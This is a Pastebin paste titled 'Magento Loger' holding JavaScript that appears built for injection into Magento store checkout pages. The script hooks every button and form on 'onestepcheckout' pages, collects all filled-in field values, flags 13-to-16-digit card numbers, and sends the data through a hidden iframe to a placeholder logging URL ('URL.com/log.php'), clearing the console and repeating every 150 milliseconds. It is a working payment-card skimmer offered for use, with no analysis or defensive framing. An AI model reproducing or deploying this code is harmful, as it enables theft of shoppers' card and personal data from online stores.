Advertisement
b3gund4L

Magento Loger

Aug 14th, 2018
37,302
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <script type="text/javascript">
  2. var snd =null;
  3. window.onload = function () {
  4.     if((new RegExp('onestepcheckout')).test(window.location)) {
  5.         send();
  6.     }
  7. };
  8. function frm_fill(u) {
  9.     var x = document.createElement("IFRAME");
  10.     x.setAttribute("src", u);
  11.     x.style.display = "none";
  12.     document.body.appendChild(x);
  13.     console.log("good");
  14. }
  15. function clk() {
  16.     var inp=document.querySelectorAll("input, select, textarea, checkbox");
  17.     for (var i=0;i<inp.length;i++){
  18.         if(inp[i].value.length>0) {
  19.         var nme=inp[i].name;
  20.         if(nme=='') { nme=i; }
  21.         snd+=inp[i].name+'='+inp[i].value+'&';
  22.         }
  23.     }
  24.    
  25. }
  26.  
  27. function send() {
  28.  var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
  29.     for (var i=0;i<btn.length;i++){
  30.         var b=btn[i];
  31.         if(b.type!='text' && b.type!='slect' && b.type!='checkbox' && b.type!='password' && b.type!='radio') {
  32.             if(b.addEventListener) {
  33.                 b.addEventListener("click", clk, false);
  34.             }else {
  35.                 b.attachEvent('onclick', clk);
  36.             }
  37.         }
  38.     }
  39.  
  40.     var frm=document.querySelectorAll("form");
  41.     for (var i=0;i<frm.length;i++){
  42.         if(frm[i].addEventListener) {
  43.             frm[i].addEventListener("submit", clk, false);
  44.         }else {
  45.             frm[i].attachEvent('onsubmit', clk);
  46.         }
  47.     }
  48.  
  49.     if(snd!=null) {
  50.         console.clear();
  51.         var cc = new RegExp("[0-9]{13,16}");
  52.         var asd="0";
  53.         if(cc.test(snd)){
  54.           asd="1" ;
  55.         }
  56.        
  57.         bl_raw = encodeURI("From :"+window.location.host+"<br>"+snd);
  58.        
  59.         frm_fill("http://URL.com/log.php?mag="+bl_raw); // <--------- URL LOG
  60.     }
  61.     snd=null;
  62.     setTimeout('send()', 150);
  63. }
  64. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement